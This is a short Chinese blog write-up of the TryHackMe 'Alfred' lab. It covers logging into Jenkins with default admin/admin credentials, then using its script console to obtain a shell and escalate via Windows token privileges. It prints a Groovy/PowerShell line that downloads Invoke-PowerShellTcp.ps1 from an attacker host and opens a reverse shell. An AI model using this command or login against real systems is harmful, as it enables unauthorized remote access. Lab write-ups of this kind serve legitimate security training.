TryHackMe-Alfred

发布于 2022-11-02  262 次阅读


简介:

利用 Jenkins 获取初始 shell,然后利用 Windows 身份验证令牌提升您的权限。

Task 1

简单nmap扫一扫

可以看出开了三个端口
访问8080,来到Jenkins的登录口,尝试密码 admin admin 成功登录

jenkins后台有个能shell的点,在manage里面

下面翻到脚本管理器

输入以下代码:

println "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.234.74:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.234.74 -Port 4646".execute().text

成功反弹shell

成功找到flag

根据提示反弹一个msf的shell

查看特权令牌

这里发现SeDebugPrivilege SeChangeNotifyPrivilege和SeImpersonatePrivilege的SeCreateGlobalPrivilege状态设置为“已启用”。
后续就跟着步骤来



届ける言葉を今は育ててる
最后更新于 2022-11-02